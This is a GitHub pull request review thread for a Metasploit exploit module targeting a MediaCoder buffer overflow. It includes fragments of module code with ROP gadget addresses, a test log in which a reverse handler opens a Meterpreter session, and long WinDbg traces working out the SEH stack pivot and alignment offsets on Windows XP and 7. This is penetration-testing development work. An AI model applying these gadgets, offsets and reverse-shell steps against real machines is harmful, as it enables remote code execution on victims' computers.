Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Added MediaCoder exploit module #2081

Merged
merged 7 commits into from Jul 12, 2013
Merged

Conversation

modpr0be
Copy link
Contributor

@modpr0be modpr0be commented Jul 6, 2013

This is an exploit module for MediaCoder exploit from exploit-db.com, EDB-ID 26403

end

def nops(rop=false, n=1)
return rop ? [0x6ab21799] * n : [0x90909090] * n
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I guess this gadget (ret gadget at 0x6ab21799? ) is target specific (MediaCoder 0.8.23.5530 in this case). If it's the case, should be on the target metadata.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Yes you're correct. I'll change it to 0x6ab16202 from swscale-2.dll, that would be universal I think..

end

def junk(n=1)
return [rand_text_alpha(4).unpack("L")[0]] * n
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Why is the random text repeated n times instead of generating different junk by calling rand_text_alpha(4).unpack("L")[0] n times? That would make the exploit's junk code more random when n > 1.

@jvazquez-r7
Copy link
Contributor

Processing...

'Author' =>
[
'metacom', # Vulnerability discovery and PoC
'modpr0be <modpr0be[at]spentera.com>' # Metasploit module
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

A comma is needed at the end of entry

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Strange, msftidy doesn't complain about it. Will add it on next commit.

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

msftidy doesn't check this. But if you run msfconsole, you will see a complaint though :-)

@wchen-r7
Copy link
Contributor

wchen-r7 commented Jul 8, 2013

Works for me on Win XP SP3:

msf exploit(handler) > exploit

[*] Started reverse handler on 10.0.1.76:4444 
[*] Starting the payload handler...
[*] Sending stage (751104 bytes) to 10.0.1.79
[*] Meterpreter session 1 opened (10.0.1.76:4444 -> 10.0.1.79:2796) at 2013-07-08 14:41:38 -0500

meterpreter >

mediacoder version:

0:006> lmv m mediacoder
start    end        module name
00400000 005c7000   mediacoder C (no symbols)           
    Loaded symbol image file: C:\Program Files\MediaCoder\mediacoder.exe
    Image path: C:\Program Files\MediaCoder\mediacoder.exe
    Image name: mediacoder.exe
    Timestamp:        Sat Jun 29 23:00:19 2013 (51CFAD53)
    CheckSum:         00000000
    ImageSize:        001C7000
    File version:     0.8.22.0
    Product version:  0.8.22.0
    File flags:       8 (Mask 1F) Private
    File OS:          4 Unknown Win32
    File type:        0.0 Unknown
    File date:        00000000.00000000
    Translations:     0409.04b0
    CompanyName:      Broad Intelligence
    ProductName:      MediaCoder
    InternalName:     mediacoder
    OriginalFilename: MediaCoder.exe
    ProductVersion:   0, 8, 23, 5530
    FileVersion:      0, 8, 23, 5530
    FileDescription:  MediaCoder
    LegalCopyright:   (C)2005-2013 Developed by Stanley Huang All Rights Reserved
    LegalTrademarks:  MediaCoder
    Comments:         http://www.mediacoderhq.com
Missing image name, possible paged-out or corrupt data.

Juan, are you on XP too?

@jvazquez-r7
Copy link
Contributor

No win7 sp1, okey, giving a new chance, starting with XP SP 3 8.23.5530

@jvazquez-r7
Copy link
Contributor

Windows XP SP3 with Windows XP SP 3 8.23.5530

0:017> version
Windows XP Version 2600 (Service Pack 3) UP Free x86 compatible
Product: WinNt, suite: SingleUserTS
kernel32.dll version: 5.1.2600.5512 (xpsp.080413-2111)
Machine Name:
Debug session time: Mon Jul  8 23:10:00.158 2013 (UTC + 2:00)
System Uptime: 0 days 0:12:38.916
Process Uptime: 0 days 0:01:48.859
  Kernel time: 0 days 0:00:01.343
  User time: 0 days 0:00:00.765
Live user mode: <Local>

Microsoft (R) Windows Debugger Version 6.2.8400.0 X86
Copyright (c) Microsoft Corporation. All rights reserved.

command line: '"C:\Program Files\Windows Kits\8.0\Debuggers\x86\windbg.exe" '  Debugger Process 0xC3C 
dbgeng:  image 6.2.8400.0, built Sat May 19 05:26:21 2012
        [path: C:\Program Files\Windows Kits\8.0\Debuggers\x86\dbgeng.dll]
dbghelp: image 6.2.8400.0, built Sat May 19 05:29:38 2012
        [path: C:\Program Files\Windows Kits\8.0\Debuggers\x86\dbghelp.dll]
        DIA version: 50127
Extension DLL search Path:
    C:\Program Files\Windows Kits\8.0\Debuggers\x86\WINXP;C:\Program Files\Windows Kits\8.0\Debuggers\x86\winext;C:\Program Files\Windows Kits\8.0\Debuggers\x86\winext\arcade;C:\Program Files\Windows Kits\8.0\Debuggers\x86\pri;C:\Program Files\Windows Kits\8.0\Debuggers\x86;C:\Program Files\Windows Kits\8.0\Debuggers\x86\winext\arcade;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem
Extension DLL chain:
    dbghelp: image 6.2.8400.0, API 6.2.6, built Sat May 19 05:29:38 2012
        [path: C:\Program Files\Windows Kits\8.0\Debuggers\x86\dbghelp.dll]
    ext: image 6.2.8400.0, API 1.0.0, built Sat May 19 05:34:27 2012
        [path: C:\Program Files\Windows Kits\8.0\Debuggers\x86\winext\ext.dll]
    exts: image 6.2.8400.0, API 1.0.0, built Sat May 19 05:39:52 2012
        [path: C:\Program Files\Windows Kits\8.0\Debuggers\x86\WINXP\exts.dll]
    uext: image 6.2.8400.0, API 1.0.0, built Sat May 19 05:39:38 2012
        [path: C:\Program Files\Windows Kits\8.0\Debuggers\x86\winext\uext.dll]
    ntsdexts: image 6.2.8400.0, API 1.0.0, built Sat May 19 05:40:37 2012
        [path: C:\Program Files\Windows Kits\8.0\Debuggers\x86\WINXP\ntsdexts.dll]
0:017> lmv m mediacoder
start    end        module name
00400000 005c7000   mediacoder   (deferred)             
    Image path: C:\Program Files\MediaCoder\mediacoder.exe
    Image name: mediacoder.exe
    Timestamp:        Sun Jun 30 06:00:19 2013 (51CFAD53)
    CheckSum:         00000000
    ImageSize:        001C7000
    File version:     0.8.22.0
    Product version:  0.8.22.0
    File flags:       8 (Mask 1F) Private
    File OS:          4 Unknown Win32
    File type:        0.0 Unknown
    File date:        00000000.00000000
    Translations:     0409.04b0
    CompanyName:      Broad Intelligence
    ProductName:      MediaCoder
    InternalName:     mediacoder
    OriginalFilename: MediaCoder.exe
    ProductVersion:   0, 8, 23, 5530
    FileVersion:      0, 8, 23, 5530
    FileDescription:  MediaCoder
    LegalCopyright:   (C)2005-2013 Developed by Stanley Huang All Rights Reserved
    LegalTrademarks:  MediaCoder
    Comments:         http://www.mediacoderhq.com

oooough! Finaly triggered... needed interact several times with the GUI to make it crash btw, add the list, click the link, lose the window focus, get the window focus, click the link again:

0:000> !exchain
0012f434: *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\MediaCoder\postproc-52.dll - 
postproc_52+14435 (6afd4435)
Invalid exception stack at b7b011ca

This time the ret is well aligned and calc spawns:

0:000> t
eax=00000000 ebx=6ab16202 ecx=6afd4435 edx=7c9032bc esi=6ab16202 edi=6ab16202
eip=6afd443f esp=0012f4bc ebp=6ab16202 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
postproc_52+0x1443f:
6afd443f c3              ret
0:000> dd esp
0012f4bc  6ab16202 6ab16202 6ab16202 100482ff
0012f4cc  ffffffc0 79544b74 66d9d9ba 6ab2241d
0012f4dc  69686872 69686872 69686872 69686872
0012f4ec  69686872 69686872 69686872 69686872
0012f4fc  69686872 69686872 69686872 69686872
0012f50c  69686872 69686872 69686872 1004cc03
0012f51c  6ab561b0 66d9feee 6ab19780 66d929f5
0012f52c  fffffcc0 62527569 6ab3c65a 1004cc03
0:000> g

Now switching to Win 7 SP1.

@jvazquez-r7
Copy link
Contributor

Again no luck on Win 7 SP1 on my tests, sorry:


Microsoft (R) Windows Debugger Version 6.2.8400.0 X86
Copyright (c) Microsoft Corporation. All rights reserved.

*** wait with pending attach
Symbol search path is: *** Invalid ***
****************************************************************************
* Symbol loading may be unreliable without a symbol search path.           *
* Use .symfix to have the debugger choose a symbol path.                   *
* After setting your symbol path, use .reload to refresh symbol locations. *
****************************************************************************
Executable search path is: 
ModLoad: 00400000 005c7000   C:\Program Files\MediaCoder\mediacoder.exe
ModLoad: 778e0000 77a1c000   C:\Windows\SYSTEM32\ntdll.dll
ModLoad: 76d80000 76e54000   C:\Windows\system32\kernel32.dll
ModLoad: 75b60000 75baa000   C:\Windows\system32\KERNELBASE.dll
ModLoad: 776e0000 77780000   C:\Windows\system32\ADVAPI32.dll
ModLoad: 77240000 772ec000   C:\Windows\system32\msvcrt.dll
ModLoad: 77a20000 77a39000   C:\Windows\SYSTEM32\sechost.dll
ModLoad: 76ac0000 76b61000   C:\Windows\system32\RPCRT4.dll
ModLoad: 713b0000 713c9000   C:\Windows\system32\AVIFIL32.dll
ModLoad: 76bc0000 76c89000   C:\Windows\system32\USER32.dll
ModLoad: 77690000 776de000   C:\Windows\system32\GDI32.dll
ModLoad: 76ab0000 76aba000   C:\Windows\system32\LPK.dll
ModLoad: 76a10000 76aad000   C:\Windows\system32\USP10.dll
ModLoad: 71360000 71392000   C:\Windows\system32\WINMM.dll
ModLoad: 77780000 778dc000   C:\Windows\system32\ole32.dll
ModLoad: 70e50000 70e64000   C:\Windows\system32\MSACM32.dll
ModLoad: 6f030000 6f051000   C:\Windows\system32\MSVFW32.dll
ModLoad: 75dc0000 76a0a000   C:\Windows\system32\SHELL32.dll
ModLoad: 76cf0000 76d47000   C:\Windows\system32\SHLWAPI.dll
ModLoad: 727d0000 72854000   C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\COMCTL32.dll
ModLoad: 75d40000 75dbb000   C:\Windows\system32\COMDLG32.dll
ModLoad: 729c0000 729dc000   C:\Windows\system32\IPHLPAPI.DLL
ModLoad: 77310000 77316000   C:\Windows\system32\NSI.dll
ModLoad: 729b0000 729b7000   C:\Windows\system32\WINNSI.DLL
ModLoad: 10000000 10092000   C:\Program Files\MediaCoder\jpeg.dll
ModLoad: 66000000 660fb000   C:\Program Files\MediaCoder\libiconv-2.dll
ModLoad: 001d0000 001f9000   C:\Program Files\MediaCoder\mccommon.dll
ModLoad: 00330000 003ce000   C:\Program Files\MediaCoder\libxml2.dll
ModLoad: 76e60000 76f55000   C:\Windows\system32\WININET.dll
ModLoad: 77320000 77456000   C:\Windows\system32\urlmon.dll
ModLoad: 77160000 771ef000   C:\Windows\system32\OLEAUT32.dll
ModLoad: 75c10000 75d2d000   C:\Windows\system32\CRYPT32.dll
ModLoad: 75aa0000 75aac000   C:\Windows\system32\MSASN1.dll
ModLoad: 76f60000 7715b000   C:\Windows\system32\iertutil.dll
ModLoad: 6afc0000 6afeb000   C:\Program Files\MediaCoder\postproc-52.dll
ModLoad: 66d80000 66dc5000   C:\Program Files\MediaCoder\avutil-52.dll
ModLoad: 75d30000 75d35000   C:\Windows\system32\PSAPI.DLL
ModLoad: 6e170000 6e1f0000   C:\Program Files\MediaCoder\SDL.dll
ModLoad: 6efd0000 6f026000   C:\Program Files\MediaCoder\SDL_image.dll
ModLoad: 6ab00000 6ab5b000   C:\Program Files\MediaCoder\swscale-2.dll
ModLoad: 727c0000 727c7000   C:\Windows\system32\WSOCK32.dll
ModLoad: 76b70000 76ba5000   C:\Windows\system32\WS2_32.dll
ModLoad: 772f0000 7730f000   C:\Windows\system32\IMM32.DLL
ModLoad: 77a40000 77b0c000   C:\Windows\system32\MSCTF.dll
ModLoad: 74840000 74880000   C:\Windows\system32\uxtheme.dll
ModLoad: 74510000 74523000   C:\Windows\system32\dwmapi.dll
ModLoad: 75980000 7598c000   C:\Windows\system32\CRYPTBASE.dll
ModLoad: 00700000 00738000   C:\Program Files\MediaCoder\mcres.dll
ModLoad: 72770000 72782000   C:\Windows\system32\dhcpcsvc.DLL
ModLoad: 75470000 754ac000   C:\Windows\system32\mswsock.dll
ModLoad: 74fc0000 74fc5000   C:\Windows\System32\wshtcpip.dll
ModLoad: 00740000 0074f000   C:\Program Files\MediaCoder\plugins\dsp_chmx.dll
ModLoad: 00750000 00756000   C:\Program Files\MediaCoder\plugins\dsp_zsc.dll
ModLoad: 018d0000 01908000   C:\Program Files\MediaCoder\SysInfo.dll
ModLoad: 74f30000 74f39000   C:\Windows\system32\VERSION.dll
ModLoad: 749c0000 74b5e000   C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
ModLoad: 75910000 7592b000   C:\Windows\system32\SspiCli.dll
ModLoad: 75a30000 75a3b000   C:\Windows\system32\profapi.dll
ModLoad: 74040000 74061000   C:\Windows\system32\ntmarta.dll
ModLoad: 771f0000 77235000   C:\Windows\system32\WLDAP32.dll
ModLoad: 75330000 75374000   C:\Windows\system32\dnsapi.DLL
ModLoad: 6f450000 6f4a2000   C:\Windows\system32\RASAPI32.dll
ModLoad: 6f620000 6f635000   C:\Windows\system32\rasman.dll
ModLoad: 73a30000 73a3d000   C:\Windows\system32\rtutils.dll
ModLoad: 713a0000 713a6000   C:\Windows\system32\sensapi.dll
ModLoad: 77460000 774e3000   C:\Windows\system32\CLBCatQ.DLL
ModLoad: 73490000 734ea000   C:\Windows\System32\netprofm.dll
ModLoad: 74130000 74140000   C:\Windows\System32\nlaapi.dll
ModLoad: 754b0000 754c6000   C:\Windows\system32\CRYPTSP.dll
ModLoad: 75250000 7528b000   C:\Windows\system32\rsaenh.dll
ModLoad: 75a20000 75a2e000   C:\Windows\system32\RpcRtRemote.dll
ModLoad: 73190000 73198000   C:\Windows\System32\npmproxy.dll
ModLoad: 71970000 71980000   C:\Windows\system32\napinsp.dll
ModLoad: 71950000 71962000   C:\Windows\system32\pnrpnsp.dll
ModLoad: 71940000 71948000   C:\Windows\System32\winrnr.dll
ModLoad: 71930000 7193d000   C:\Windows\system32\wshbth.dll
ModLoad: 75460000 75466000   C:\Windows\System32\wship6.dll
ModLoad: 735c0000 735c6000   C:\Windows\system32\rasadhlp.dll
ModLoad: 72870000 728a8000   C:\Windows\System32\fwpuclnt.dll
ModLoad: 6e280000 6ed00000   C:\Windows\System32\ieframe.dll
ModLoad: 6e240000 6e27c000   C:\Windows\System32\OLEACC.dll
ModLoad: 75930000 7597c000   C:\Windows\system32\apphelp.dll
ModLoad: 76bb0000 76bb3000   C:\Windows\system32\Normaliz.dll
ModLoad: 6e210000 6e23e000   C:\Windows\system32\MLANG.dll
ModLoad: 72250000 723bf000   C:\Windows\system32\explorerframe.dll
ModLoad: 745c0000 745ef000   C:\Windows\system32\DUser.dll
ModLoad: 745f0000 746a2000   C:\Windows\system32\DUI70.dll
ModLoad: 6b2b0000 6b867000   C:\Windows\System32\mshtml.dll
ModLoad: 718e0000 7190a000   C:\Windows\System32\msls31.dll
ModLoad: 70070000 7007b000   C:\Windows\system32\msimtf.dll
ModLoad: 6e0b0000 6e162000   C:\Windows\System32\jscript.dll
ModLoad: 71860000 7186b000   C:\Windows\system32\ImgUtil.dll
ModLoad: 6fd30000 6fd3e000   C:\Windows\System32\pngfilt.dll
ModLoad: 75990000 759ef000   C:\Windows\system32\SXS.DLL
ModLoad: 74880000 74975000   C:\Windows\system32\propsys.dll
ModLoad: 774f0000 7768d000   C:\Windows\system32\SETUPAPI.dll
ModLoad: 75bb0000 75bd7000   C:\Windows\system32\CFGMGR32.dll
ModLoad: 75ab0000 75ac2000   C:\Windows\system32\DEVOBJ.dll
ModLoad: 74530000 74569000   C:\Windows\system32\MMDevAPI.DLL
ModLoad: 70f90000 70fc0000   C:\Windows\system32\wdmaud.drv
ModLoad: 70f80000 70f84000   C:\Windows\system32\ksuser.dll
ModLoad: 74070000 74077000   C:\Windows\system32\AVRT.dll
ModLoad: 70f30000 70f66000   C:\Windows\system32\AUDIOSES.DLL
ModLoad: 70e70000 70e78000   C:\Windows\system32\msacm32.drv
ModLoad: 70e40000 70e47000   C:\Windows\system32\midimap.dll
ModLoad: 75090000 750a7000   C:\Windows\system32\USERENV.dll
ModLoad: 75be0000 75c0d000   C:\Windows\system32\wintrust.dll
ModLoad: 752c0000 752fa000   C:\Windows\system32\schannel.DLL
ModLoad: 6d980000 6dab3000   C:\Windows\System32\msxml3.dll
ModLoad: 742a0000 742af000   C:\Windows\system32\wkscli.dll
ModLoad: 742b0000 742b9000   C:\Windows\system32\netutils.dll
ModLoad: 75180000 75188000   C:\Windows\system32\credssp.dll
ModLoad: 744e0000 7450f000   C:\Windows\system32\XmlLite.dll
ModLoad: 758f0000 758f8000   C:\Windows\system32\secur32.dll
ModLoad: 75600000 75638000   C:\Windows\system32\ncrypt.dll
ModLoad: 755e0000 755f7000   C:\Windows\system32\bcrypt.dll
ModLoad: 75190000 751cd000   C:\Windows\system32\bcryptprimitives.dll
ModLoad: 75070000 75086000   C:\Windows\system32\GPAPI.dll
ModLoad: 6fc70000 6fc8c000   C:\Windows\system32\cryptnet.dll
ModLoad: 73000000 73015000   C:\Windows\system32\Cabinet.dll
ModLoad: 75230000 7523e000   C:\Windows\system32\DEVRTL.dll
(434.44c): Break instruction exception - code 80000003 (first chance)
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\SYSTEM32\ntdll.dll - 
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\system32\kernel32.dll - 
eax=7ffa5000 ebx=00000000 ecx=00000000 edx=7797f125 esi=00000000 edi=00000000
eip=779140f0 esp=060eff5c ebp=060eff88 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
ntdll!DbgBreakPoint:
779140f0 cc              int     3
0:023> .symfix
0:023> .reload
Reloading current modules
................................................................
.........................................................
0:023> g
ModLoad: 6fd20000 6fd25000   C:\Windows\system32\msimg32.dll
ModLoad: 71880000 718d8000   C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll
ModLoad: 743e0000 744db000   C:\Windows\system32\WindowsCodecs.dll
ModLoad: 72150000 72181000   C:\Windows\system32\EhStorShell.dll
ModLoad: 720e0000 7214a000   C:\Windows\System32\cscui.dll
ModLoad: 720d0000 720d9000   C:\Windows\System32\CSCDLL.dll
ModLoad: 720c0000 720cb000   C:\Windows\system32\CSCAPI.dll
ModLoad: 72050000 720c0000   C:\Windows\system32\ntshrui.dll
ModLoad: 75880000 75899000   C:\Windows\system32\srvcli.dll
ModLoad: 73da0000 73daa000   C:\Windows\system32\slc.dll
ModLoad: 72e10000 72ea4000   C:\Windows\system32\MsftEdit.dll
ModLoad: 6cae0000 6cb3c000   C:\Windows\System32\StructuredQuery.dll
ModLoad: 71f30000 71f7e000   C:\Windows\system32\actxprxy.dll
ModLoad: 6bc00000 6bc2b000   C:\Program Files\Internet Explorer\ieproxy.dll
ModLoad: 6df50000 6df66000   C:\Windows\system32\thumbcache.dll
ModLoad: 72190000 721be000   C:\Windows\system32\SHDOCVW.dll
ModLoad: 6c740000 6c7e0000   C:\Windows\system32\SearchFolder.dll
ModLoad: 716c0000 71858000   C:\Windows\system32\NetworkExplorer.dll
ModLoad: 71f20000 71f29000   C:\Windows\system32\LINKINFO.dll
ModLoad: 74290000 7429f000   C:\Windows\system32\samcli.dll
ModLoad: 74980000 74992000   C:\Windows\system32\SAMLIB.dll
ModLoad: 077a0000 0798d000   geany.exe
ModLoad: 077a0000 0798d000   geany.exe
ModLoad: 077a0000 07834000   burn.exe
ModLoad: 077a0000 07a52000   procexp.exe
ModLoad: 077a0000 07a52000   procexp.exe
ModLoad: 077a0000 07967000   image077a0000
ModLoad: 077a0000 07967000   image077a0000
ModLoad: 077a0000 091c0000   mplayer.exe
(434.88c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for C:\Program Files\MediaCoder\mediacoder.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\MediaCoder\mediacoder.exe
eax=000000f1 ebx=76bcad60 ecx=04f6c578 edx=fb1c3a88 esi=005308c8 edi=000701dc
eip=0042daf3 esp=0012f090 ebp=0012f1f4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210202
mediacoder+0x2daf3:
0042daf3 88040a          mov     byte ptr [edx+ecx],al      ds:0023:00130000=41
0:000> !exchain
0012f3f4: *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\MediaCoder\postproc-52.dll - 
postproc_52+14435 (6afd4435)
Invalid exception stack at b7b011ca
0:000> bp 6afd4435
0:000> g
Breakpoint 0 hit
eax=00000000 ebx=00000000 ecx=6afd4435 edx=779271cd esi=00000000 edi=00000000
eip=6afd4435 esp=0012eb58 ebp=0012eb78 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
postproc_52+0x14435:
6afd4435 81c4ac070000    add     esp,7ACh
0:000> t
eax=00000000 ebx=00000000 ecx=6afd4435 edx=779271cd esi=00000000 edi=00000000
eip=6afd443b esp=0012f304 ebp=0012eb78 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443b:
6afd443b 5b              pop     ebx
0:000> t
eax=00000000 ebx=1cd04680 ecx=6afd4435 edx=779271cd esi=00000000 edi=00000000
eip=6afd443c esp=0012f308 ebp=0012eb78 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443c:
6afd443c 5e              pop     esi
0:000> t
eax=00000000 ebx=1cd04680 ecx=6afd4435 edx=779271cd esi=2c130153 edi=00000000
eip=6afd443d esp=0012f30c ebp=0012eb78 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443d:
6afd443d 5f              pop     edi
0:000> t
eax=00000000 ebx=1cd04680 ecx=6afd4435 edx=779271cd esi=2c130153 edi=d3265f27
eip=6afd443e esp=0012f310 ebp=0012eb78 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443e:
6afd443e 5d              pop     ebp
0:000> t
eax=00000000 ebx=1cd04680 ecx=6afd4435 edx=779271cd esi=2c130153 edi=d3265f27
eip=6afd443f esp=0012f314 ebp=94946d13 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443f:
6afd443f c3              ret
0:000> dd esp
0012f314  87ae76d4 98f5b5e2 1a7c0e92 33f07a57
0012f324  13418be4 f142122f 3e4f3b66 86c2f9cb
0012f334  17e28bd5 5fc75e54 aed0b9a1 25a8b464
0012f344  2e3f8f4c c5f13b01 903c9a29 20acbe56
0012f354  8e938a04 f9522618 d8a1b196 a3fa7242
0012f364  9858b70c 7eaec68d bfc1e5b6 60da95ff
0012f374  43110675 760493a8 2c5ab6ef 0796dd1b
0012f384  2b271255 6a30b916 a8a09d08 c4cc5283
0:000> g
(434.88c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=1cd04680 ecx=6afd4435 edx=779271cd esi=2c130153 edi=d3265f27
eip=87ae76d4 esp=0012f318 ebp=94946d13 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210212
87ae76d4 ??              ???
0:000> lmv m mediacoder
start    end        module name
00400000 005c7000   mediacoder C (no symbols)           
    Loaded symbol image file: C:\Program Files\MediaCoder\mediacoder.exe
    Image path: C:\Program Files\MediaCoder\mediacoder.exe
    Image name: mediacoder.exe
    Timestamp:        Sun Jun 30 06:00:19 2013 (51CFAD53)
    CheckSum:         00000000
    ImageSize:        001C7000
    File version:     0.8.22.0
    Product version:  0.8.22.0
    File flags:       8 (Mask 1F) Private
    File OS:          4 Unknown Win32
    File type:        0.0 Unknown
    File date:        00000000.00000000
    Translations:     0409.04b0
    CompanyName:      Broad Intelligence
    ProductName:      MediaCoder
    InternalName:     mediacoder
    OriginalFilename: MediaCoder.exe
    ProductVersion:   0, 8, 23, 5530
    FileVersion:      0, 8, 23, 5530
    FileDescription:  MediaCoder
    LegalCopyright:   (C)2005-2013 Developed by Stanley Huang All Rights Reserved
    LegalTrademarks:  MediaCoder
    Comments:         http://www.mediacoderhq.com
0:000> version
Windows 7 Version 7601 (Service Pack 1) UP Free x86 compatible
Product: WinNt, suite: SingleUserTS
kernel32.dll version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
Machine Name:
Debug session time: Mon Jul  8 23:28:56.105 2013 (UTC + 2:00)
System Uptime: 0 days 0:07:36.480
Process Uptime: 0 days 0:01:17.513
  Kernel time: 0 days 0:00:00.920
  User time: 0 days 0:00:00.795
Live user mode: <Local>

Microsoft (R) Windows Debugger Version 6.2.8400.0 X86
Copyright (c) Microsoft Corporation. All rights reserved.

command line: '"C:\Program Files\Windows Kits\8.0\Debuggers\x86\windbg.exe" '  Debugger Process 0xAE8 
dbgeng:  image 6.2.8400.0, built Sat May 19 05:26:21 2012
        [path: C:\Program Files\Windows Kits\8.0\Debuggers\x86\dbgeng.dll]
dbghelp: image 6.2.8400.0, built Sat May 19 05:29:38 2012
        [path: C:\Program Files\Windows Kits\8.0\Debuggers\x86\dbghelp.dll]
        DIA version: 50127
Extension DLL search Path:
    C:\Program Files\Windows Kits\8.0\Debuggers\x86\WINXP;C:\Program Files\Windows Kits\8.0\Debuggers\x86\winext;C:\Program Files\Windows Kits\8.0\Debuggers\x86\winext\arcade;C:\Program Files\Windows Kits\8.0\Debuggers\x86\pri;C:\Program Files\Windows Kits\8.0\Debuggers\x86;C:\Program Files\Windows Kits\8.0\Debuggers\x86\winext\arcade;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
Extension DLL chain:
    dbghelp: image 6.2.8400.0, API 6.2.6, built Sat May 19 05:29:38 2012
        [path: C:\Program Files\Windows Kits\8.0\Debuggers\x86\dbghelp.dll]
    ext: image 6.2.8400.0, API 1.0.0, built Sat May 19 05:34:27 2012
        [path: C:\Program Files\Windows Kits\8.0\Debuggers\x86\winext\ext.dll]
    exts: image 6.2.8400.0, API 1.0.0, built Sat May 19 05:39:52 2012
        [path: C:\Program Files\Windows Kits\8.0\Debuggers\x86\WINXP\exts.dll]
    uext: image 6.2.8400.0, API 1.0.0, built Sat May 19 05:39:38 2012
        [path: C:\Program Files\Windows Kits\8.0\Debuggers\x86\winext\uext.dll]
    ntsdexts: image 6.2.8400.0, API 1.0.0, built Sat May 19 05:40:37 2012
        [path: C:\Program Files\Windows Kits\8.0\Debuggers\x86\WINXP\ntsdexts.dll]

@wchen-r7
Copy link
Contributor

wchen-r7 commented Jul 8, 2013

Notice on Windows 7, both Juan and I have the exact same ESP address when we do the "ADD ESP, 7ACh" alignment, and then we both experience the same crash due to a bad landing. The ESP address at the time of the alignment also appears to be consistent after retries. I did a quick comparison between a successful attempt on XP vs Win 7, it looks like we're still 0x168 bytes off from the ROP NOP we need:

0:000> r
eax=00000000 ebx=00000000 ecx=6afd4435 edx=77ba71cd esi=00000000 edi=00000000
eip=6afd4435 esp=0012eb58 ebp=0012eb78 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
postproc_52+0x14435:
6afd4435 81c4ac070000    add     esp,7ACh
...
0:000> p
eax=00000000 ebx=db516e95 ecx=6afd4435 edx=77ba71cd esi=5faa8b36 edi=458cbb9f
eip=6afd443f esp=0012f314 ebp=859ed87c iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
postproc_52+0x1443f:
6afd443f c3              ret
0:000> dd esp L1
0012f314  4e471017  <--- Random data

0:000> dd esp+0x168 L1
0012f47c  6ab16202  <--- We are 0x168 bytes off to this

I'm not very sure why the starting ESP is so different even though we're all on Win 7 SP1. I can only assume maybe somewhere during window subclassing, the system decided to do something different - a condition we need to control.

@modpr0be
Copy link
Contributor Author

modpr0be commented Jul 9, 2013

I put more testing with another physical box, MediaCoder 0.8.23.5530 with Win 7.

(1008.14cc): Break instruction exception - code 80000003 (first chance)
eax=7ffdd000 ebx=00000000 ecx=00000000 edx=7791d5cb esi=00000000 edi=00000000
eip=778b3258 esp=0185ff5c ebp=0185ff88 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\SYSTEM32\ntdll.dll - 
ntdll!DbgBreakPoint:
778b3258 cc              int     3
0:013> g
ModLoad: 6d900000 6d958000   C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll
ModLoad: 73ac0000 73bbb000   C:\Windows\system32\WindowsCodecs.dll
ModLoad: 6dd70000 6dda1000   C:\Windows\system32\EhStorShell.dll
ModLoad: 762e0000 7647d000   C:\Windows\system32\SETUPAPI.dll
ModLoad: 75a70000 75a97000   C:\Windows\system32\CFGMGR32.dll
ModLoad: 75a50000 75a62000   C:\Windows\system32\DEVOBJ.dll
ModLoad: 74550000 74645000   C:\Windows\system32\PROPSYS.dll
ModLoad: 6dd00000 6dd6a000   C:\Windows\System32\cscui.dll
